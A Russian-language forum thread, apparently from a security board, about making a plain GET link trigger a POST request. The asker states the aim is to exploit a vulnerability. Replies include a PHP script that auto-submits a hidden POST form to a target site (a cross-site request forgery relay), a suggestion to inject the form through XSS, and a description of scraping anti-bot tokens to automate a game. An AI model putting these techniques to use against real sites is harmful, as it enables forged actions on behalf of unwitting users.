POST запрос, но с помощью GET

Discussion in 'PHP' started by ChymeNik, 13 Nov 2012.

  1. ChymeNik

    ChymeNik Member

    Joined:
    31 Aug 2010
    Messages:
    29
    Likes Received:
    7
    Reputations:
    9
    Возможно ли такое? чтобы запрос посылался как GET, но сервер думал, что это POST :)
     
  2. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Скорее всего нет, но это зависит от криворукости кодеров, которые писали сервер. Зачем такое извращение?
     
  3. Redfern89

    Redfern89 New Member

    Joined:
    12 Jul 2012
    Messages:
    42
    Likes Received:
    1
    Reputations:
    -3
    попробуй сделать так

    привожу пример на html
    PHP:
    <form action="olololo.php?param1=value1&param2=value2">
    <
    input type="submit">
    </
    form>
    скрипт на сервере может по-разному обрабатывать запрос:
    PHP:
    <?php

    // Тут все зависит от того, какой массив используется в условии 
    //и каким массивом передаются данные в обработку (в данном случае в $var

    // 1й вариант
    if ($_POST['param1'] == 'value1') { 
    $var $_POST['value2'];
    }

    // 2й вариант
    if($_REQUEST['param1'] == 'value1']) {
    $var $_REQUEST['value2'];
    }

    // 3й вариант
    if ($_POST['param1'] == 'value1') {
    $var $_REQUEST['value2'];
    }

    ?>
    если обработка идет, как в 1м варианте - то ты пролетаешь.) если 2,3й вариант, то возможно что-то выгорит)) но зачем так извращаться?)))))
     
    #3 Redfern89, 14 Nov 2012
    Last edited: 14 Nov 2012
  4. RomalB

    RomalB New Member

    Joined:
    5 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Нет.
     
  5. ChymeNik

    ChymeNik Member

    Joined:
    31 Aug 2010
    Messages:
    29
    Likes Received:
    7
    Reputations:
    9
    Всем спасибо за ответы.. это не извращение, нужно для приведения уязвимости в действие:).
     
  6. r0by

    r0by Banned

    Joined:
    24 May 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    POST /script.php?param1=1 HTTP/1.0
    Host: site.domain.zone
    Cookie: param1=1;
    Content-length: 8

    param1=1

    $_GET['param1'], $_POST['param1'], $_COOKIE['param1'], $_REQUEST['param1'] будут равны единице =)
     
  7. ChymeNik

    ChymeNik Member

    Joined:
    31 Aug 2010
    Messages:
    29
    Likes Received:
    7
    Reputations:
    9
    Тут запрос посылается методом POST. Нужно, чтобы можно было просто открыть URL как ссылку (GET) и запрос выполнился.
     
  8. r0by

    r0by Banned

    Joined:
    24 May 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    для этого нужна XSS на странице чтобы можно было заправить в BODY форму для отправки пост запроса
     
  9. Anonhead

    Anonhead New Member

    Joined:
    7 Nov 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    -5
    Вроде можно.
    Делаешь у себя на сайте скрипт следующего содержания:

    PHP:
    <?php
    $a
    =$_GET['a'];$b=$_GET['b'];
    echo 
    '
    <html>
    <body>
    <form name="form" method="POST" action="http://example.com/page.php">
    <input type="hidden" name="Нужное имя запроса" value="'
    .$a.'">
    <input type="hidden" name="Нужное имя запроса1" value="'
    .$b.'">
    <script type="text/javascript">document.forms.form.submit();</script>
    </form>
    </body>
    </html>'
    ;
    ?>
    Далее переходишь на свой сайт (куда ты залил скрипт, например, vk.com/lol.php) и задаёшь запросам нужное содержание следующим образом vk.com/lol.php?a=123&b=1234
    Не забудь изменить имена инпутов на необходимые.
     
    #9 Anonhead, 18 Nov 2012
    Last edited: 18 Nov 2012
  10. bdsql

    bdsql New Member

    Joined:
    28 Dec 2011
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    также подумал.
    но здесь уже зависит если принимающий запрос чекает по рефферу, если нет тогда пашет)
     
  11. Anonhead

    Anonhead New Member

    Joined:
    7 Nov 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    -5
    врят-ли чекает) я таким способом написал себе бота для одной очень знаменитой игрухи на php) там не чекали, хотя онлайн по 7 тысяч. Но там была защита. Вместе с данными передавался хеш (даже несколько), которые генерироваись только при "натуральной" загрузке страницы. Эту проблему удалось решить с помощью gethtml. Сначала я получал всю страницу целиком. Меня считали за нормального пользователя и генерировали для меня необходимые коды, которые потом помещались в скрытые поля. Я их оттуда вытаскивал и передавал вместе с данными.
     
  12. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Почитай что такое java script